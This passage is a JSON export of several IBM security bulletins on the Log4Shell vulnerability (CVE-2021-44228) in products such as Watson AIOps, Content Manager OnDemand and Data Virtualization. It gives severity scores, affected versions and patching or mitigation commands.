"HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-04T16:53:29", "id": "4D6D019876F2EE83F308FCD9E27F7FE176603A605EC9CDF1DBCD5C5C9951EDE5", "href": "https://www.ibm.com/support/pages/node/6538138", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:40:58", "description": "## Summary\n\nA vulnerability was identified within the Apache Log4j library that is used by IBM Cloud Pak for Watson AIOps. This vulnerability has been addressed.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44228](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against attacker controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially crafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam. \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/214921](<https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nICP - Watson AIOps| 1.0.x \nICP - Watson AIOps| 2.0.x \nICP - Watson AIOps| 2.1.x \nICP - Watson AIOps| 3.x \n \n\n\n## Remediation/Fixes\n\nInstall the fix for this CVE by installing Interim Fix [HF19458](<https://ibm.biz/BdfTYV>)\n\n## Workarounds and Mitigations\n\nIBM strongly recommends to apply the interim fix now.\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n15 Dec 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSJGDOB\",\"label\":\"IBM Watson AIOps\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF016\",\"label\":\"Linux\"}],\"Version\":\"3.2.0\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB45\",\"label\":\"Automation\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-05T18:28:18", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Log4j affects IBM Cloud Pak for Watson AIOps (CVE-2021-44228)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-04-05T18:28:18", "id": "4EB30F982289A93326697168C61CCD073ED91E21FFACB7414B6EA10DBFA0E2B0", "href": "https://www.ibm.com/support/pages/node/6529258", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-10T05:27:16", "description": "## Summary\n\nThere is vulnerability in Apache Log4j used by Content Manager OnDemand z/OS. Content Manager OnDemand z/OS has addressed the applicable CVE. [CVE-2021-44228]\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44228](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against attacker controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially crafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam. \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/214921](<https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nContent Manager OnDemand for z/OS| 10.1.x \nContent Manager OnDemand for z/OS| 10.5.x \n \n## Remediation/Fixes\n\nPlease go to ShopZ or use normal ordering process from the z system\n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Acknowledgement\n\n## Change History\n\n21 Jan 2022: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSQHWE\",\"label\":\"Content Manager OnDemand for z\\/OS\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF035\",\"label\":\"z\\/OS\"}],\"Version\":\"10.x\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB45\",\"label\":\"Automation\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-10-10T06:20:13", "type": "ibm", "title": "Security Bulletin: There is vulnerability in Apache Log4j used by Content Manager OnDemand z/OS. Content Manager OnDemand z/OS has addressed the applicable CVE [CVE-2021-44228]", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-10-10T06:20:13", "id": "AF14D81F9945B81EA39B6923FB2CB4E62949A34EE9CCFEF7120D6D6700FA48A1", "href": "https://www.ibm.com/support/pages/node/6825877", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-12-05T21:30:02", "description": "## Summary\n\nLog4j is used by IBM Cloud Transformation Advisor for generating logs in some components and tools. This bulletin provides a remediation for the reported CVE-2021-44228 by upgrading IBM Cloud Transformation Advisor version to 2.5.1.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44228](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against attacker controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially crafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam. \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/214921](<https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Cloud Transformation Advisor| 2.5.0 \n \n\n\n## Remediation/Fixes\n\nUpgrade to 2.5.1 or later. \n\nIBM Cloud Transformation Advisor can be installed from OperatorHub page in Red Hat OpenShift Container Platform or locally following this [link](<https://www.ibm.com/cloud/architecture/tutorials/install-ibm-transformation-advisor-local> \"link\" ).\n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n13 Dec 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SS5Q6W\",\"label\":\"IBM Cloud Transformation Advisor\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF016\",\"label\":\"Linux\"}],\"Version\":\"2.0\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB45\",\"label\":\"Automation\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-12-05T19:00:57", "type": "ibm", "title": "Security Bulletin: IBM Cloud Transformation Advisor is affected by Apache Log4j vulnerability (CVE-2021-44228)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-12-05T19:00:57", "id": "558ED6F880AE90E6CA233933ED947E6F8B2EFF2613CBD4FECB6553DBCB9609BA", "href": "https://www.ibm.com/support/pages/node/6526212", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:46:19", "description": "## Summary\n\nThere is a vulnerability in the Apache Log4j open source library used by IBM Financial Crimes Insight for Claims Fraud for generating logs in some of its components. This bulletin provides mitigations for the Log4Shell vulnerability (CVE-2021-44228) by applying the applicable workaround steps to IBM Financial Crimes Insight for Claims Fraud.\n\n## Vulnerability Details\n\nRefer to the security bulletin(s) listed in the Remediation/Fixes section\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nCounter Fraud Management - Banking| All \n \n\n\n## Remediation/Fixes\n\nNone\u200b\n\n## Workarounds and Mitigations\n\nThe recommended solution is to apply the fix for Elastic Search and Hadoop as in steps below as soon as possible.\n\n**Steps for Elastic Search:**\n\nTo fix the log4j vulnerability in Elastic Search for IBM Financial Crimes Insight for Claims Fraud, complete the following steps:\n\n 1. Log into OpenShift cluster using `oc login` from Ambari server.\n 2. Ensure all Elastic Search pods are healthy and Running. \n \n oc get po | grep fci-elasticsearch\n\n 3. Set the `JVM` property to apply log4j fix. To set, complete the following commands. \n \n oc patch sts fci-elasticsearch-master -p '{\"spec\":{\"template\":{\"spec\":{\"containers\":[{\"name\":\"elasticsearch\",\"env\":[{\"name\":\"ES_JAVA_OPTS\",\"value\":\"-Dlog4j2.formatMsgNoLookups=true\"}]}]}}}}'\n oc patch sts fci-elasticsearch-data -p '{\"spec\":{\"template\":{\"spec\":{\"containers\":[{\"name\":\"elasticsearch\",\"env\":[{\"name\":\"ES_JAVA_OPTS\",\"value\":\"-Dlog4j2.formatMsgNoLookups=true\"}]}]}}}}'\n oc patch sts fci-elasticsearch-client -p '{\"spec\":{\"template\":{\"spec\":{\"containers\":[{\"name\":\"elasticsearch\",\"env\":[{\"name\":\"ES_JAVA_OPTS\",\"value\":\"-Dlog4j2.formatMsgNoLookups=true\"}]}]}}}}'\n\nThe Elastic Search pods are restarted automatically after the commands are executed.\n\n 4. Ensure all Elastic search pods are restarted. \n \n oc get po | grep fci-elasticsearch\n\n 5. Verify if the log4j fix is applied successfully. The JVM process starts with a new JVM argument `-Dlog4j2.formatMsgNoLookups=true`. \n \n oc exec fci-elasticsearch-data-0 -- ps aux\n oc exec fci-elasticsearch-master-0 -- ps aux\n\n\n\n**Steps for Hadoop:**\n\nTo fix the log4j vulnerability in Hadoop for IBM Financial Crimes Insight for Claims Fraud, complete the following steps:\n\n 1. 1. Download the [cloudera-scripts-for-log4j-main.zip](<https://github.com/cloudera/cloudera-scripts-for-log4j/archive/refs/heads/main.zip>) file.\n 2. Copy it to all the Hadoop nodes.\n 3. Do the following steps for every Hadoop nodes: \n\n 1. Copy the `cloudera-scripts-for-log4j-main.zip` file to the `/root/`.\n 2. Run the below commands to extract the `.zip` file: \n \n cd /root\n unzip cloudera-scripts-for-log4j-main.zip\n\n 3. Run the below command and note down the folder names, such as `/usr`, `/fcigraph`, and `/grid`. \n \n find / -name log4j*.jar > list_of_impacted_jars.txt\n\n 4. Create a backup folder with the below command. \n \n mkdir /log4j_backup\n\n 5. Run the following command for each folder found in the preceding step to apply the fix: \n \n ./run_log4j_patcher.sh hdp -t /usr/ -b /log4j_backup > patch.log 2>&1 &\n\n**Note**: In the above command, replace `/usr/` with the folder names at the preceding step, such as `/fcigraph/`, `/grid/`, etc.\n\nThis process may take 10 to 15 minutes.\n\n 4. Run the following commans to verify: \n \n cd /log4j_backup\n find . -name *.backup\n\n**Note**: This lists all the impacted `.jar` files that are patched, and the list matches the list_of_impacted_jars.txt.\n\n 5. Restart the impacted services from Ambari console (`hive` and `oozie`).\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n20 Dec 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU053\",\"label\":\"Cloud & Data Platform\"},\"Product\":{\"code\":\"SS3QGT\",\"label\":\"IBM Financial Crimes Insight\"},\"Component\":\"FCI, DD, Surveillance, CFM - Banking, Healthcare, Insurance, Government\",\"Platform\":[{\"code\":\"PF016\",\"label\":\"Linux\"}],\"Version\":\"ALL\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB10\",\"label\":\"Data and AI\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-21T05:58:43", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Log4j affects the components (Elastic Search and Hadoop) of IBM Financial Crimes Insight for Claims Fraud", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-21T05:58:43", "id": "DF859649010EE2675B4BBF6D4BFAE7D654D24685054B3403A45C4270AD966550", "href": "https://www.ibm.com/support/pages/node/6528874", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:44:45", "description": "## Summary\n\nApache Log4j is used by the QMF Vision component of IBM QMF Analytics for Multiplatforms as part of its logging infrastructure and is vulnerable to arbitrary code execution (CVE-2021-44228). The fix includes Apache Log4j v2.17.0.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44228](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against attacker controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially crafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam. \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/214921](<https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \n \nIBM QMF Analytics for Multiplatforms\n\n\\- QMF Vision\n\n| \n\n12.1, 12.2.0.x \n \n## Remediation/Fixes\n\nIBM strongly recommends addressing the vulnerability now. Apache Log4j is upgraded to v2.17.0 in the following fix and downloadable from FixCentral. \n\n**Product Component**| **Download URLS** \n---|--- \n \nQMF Vision\n\n| [http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7EInformation%20Management&product=ibm/Information+Management/IBM+QMF+Analytics+for+Multiplatforms&release=All&platform=All&function=fixId&fixids=qmf_mp_vision_v12205_Interim_Fix_2&includeSupersedes=0&source=fc](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7EInformation%20Management&product=ibm/Information+Management/IBM+QMF+Analytics+for+Multiplatforms&release=All&platform=All&function=fixId&fixids=qmf_mp_vision_v12205_Interim_Fix_2&includeSupersedes=0&source=fc>) \n \n## Workarounds and Mitigations\n\nSee Remediation and Fixes section. \n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Acknowledgement\n\n## Change History\n\n12 Jan 2022: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SS6QWT\",\"label\":\"IBM QMF Analytics for Multiplatforms\"},\"Component\":\"QMF Vision\",\"Platform\":[{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF033\",\"label\":\"Windows\"}],\"Version\":\"12.2.0.5\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB10\",\"label\":\"Data and AI\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-15T00:04:01", "type": "ibm", "title": "Security Bulletin: IBM QMF Analytics for Multiplatforms is vulnerable to arbitrary code execution due to Apache Log4j (CVE-2021-44228)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-15T00:04:01", "id": "887B058F572F29D81FDE73F26FFA89AE94C5B73C248CDC8EB74C172F09B39B6D", "href": "https://www.ibm.com/support/pages/node/6541160", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:44:07", "description": "## Summary\n\nThere is a vulnerability in the version of the Log4j open source library that is part of IBM Data Virtualization on Cloud Pak for Data\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44228](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against attacker controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially crafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam. \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/214921](<https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **DV Version(s) \n**| **CPD Version(s) ** \n---|---|--- \nIBM Data Virtualization(DV) on Cloud Pak for Data(CPD)| 1.3.0| 2.5.0 \nIBM Data Virtualization(DV) on Cloud Pak for Data(CPD)| 1.4.1| 3.0.1 \nIBM Data Virtualization(DV) on Cloud Pak for Data(CPD)| 1.5.0| 3.5, 3.5 Refresh 1 - 9 \nIBM Data Virtualization(DV) on Cloud Pak for Data(CPD)| 1.7.1 - 1.7.3| 4.0 Refresh 1 - 3 \n \n## Remediation/Fixes\n\n**Affected Product(s)**| **DV Version(s) \n**| **CPD Version(s) **| **Fixes \n** \n---|---|---|--- \nIBM Data Virtualization(DV) on Cloud Pak for Data(CPD)| 1.3.0| 2.5.0| \n\nUpgrade to version 1.5.0 patch version 1.5.0.0-270 (DV) /\n\n3.5 Refresh 10 (CPD) \n \nIBM Data Virtualization(DV) on Cloud Pak for Data(CPD)| 1.4.1| 3.0.1| \n\nUpgrade to version 1.5.0 patch version 1.5.0.0-270 (DV) /\n\n3.5 Refresh 10 (CPD) \n \nIBM Data Virtualization(DV) on Cloud Pak for Data(CPD)| 1.5.0| \n\n3.5,\n\n3.5 Refresh 1 - 9\n\n| \n\nApply patch version 1.5.0.0-270 (DV) /\n\n3.5 Refresh 10 (CPD) \n \nIBM Data Virtualization(DV) on Cloud Pak for Data(CPD)| 1.7.1 - 1.7.3| 4.0 Refresh 1 - 3| \n\nUpdate to version 1.7.3 (DV) /\n\n4.0 Refresh 4 (CPD) \n \n**You must update the Cloud Pak for Data platform to version 4.0 Refresh 4 to install the Log4Shell fix for Data Virtualization.**\n\nTo update Cloud Pak for Data platform to 4.0 Refresh 4, see the following links:\n\n * [Updating Data Virtualization from Version 3.5](<https://www.ibm.com/docs/SSQNUZ_4.0/svc-dv/dv-operator-upgrade-v35.html> \"Updating Data Virtualization from Version 3.5\" )\n * [Updating Data Virtualization from Version 4.0.1 or later](<https://www.ibm.com/docs/SSQNUZ_4.0/svc-dv/dv-operator-upgrade-v4.html>)\n\nIf you are upgrading from IBM Cloud Pak for Data 4.0 Refresh 3, the Data Virtualization pods will restart after the db2u operator is updated. If the db2u operator subscription installPlanApproval is set to \"Automatic\", the Data Virtualization pods will restart when the db2u operator catalog is updated. After the restart of the Data Virtualization pods is complete, you must also manually restart the header and worker pods to complete the Log4Shell fix. This manual restart can be performed by running the following command:\n \n \n current_replicas=$(oc get sts c-db2u-dv-db2u -o jsonpath=\"{.spec.replicas}\");oc scale sts c-db2u-dv-db2u --replicas=0; sleep 3m; oc scale sts c-db2u-dv-db2u --replicas=$current_replicas\n\nIf you are upgrading from a version of IBM Cloud Pak for Data other than 4.0 Refresh 3, you can restart Data Virtualization head and worker pods after the upgrade has finished successfully. \n \nYou can also run the following commands to delete old files from your updated Data Virtualization instance that contained old log4j binaries.\n \n \n 1. oc rsh c-db2u-dv-db2u-0\n 2. su - db2inst1\n 3. rm -rf /mnt/blumeta0/home/db2inst1/sqllib/datavirtualization/dvm_driver/log4j-api-2.8.2.jar /mnt/blumeta0/home/db2inst1/sqllib/datavirtualization/dvm_driver/log4j-core-2.8.2.jar /mnt/bludata0/dv/versioned/pre_migration/sqllib/datavirtualization/dvm_driver/log4j-api-2.8.2.jar /mnt/bludata0/dv/versioned/pre_migration/sqllib/datavirtualization/dvm_driver/log4j-core-2.8.2.jar\n 4. 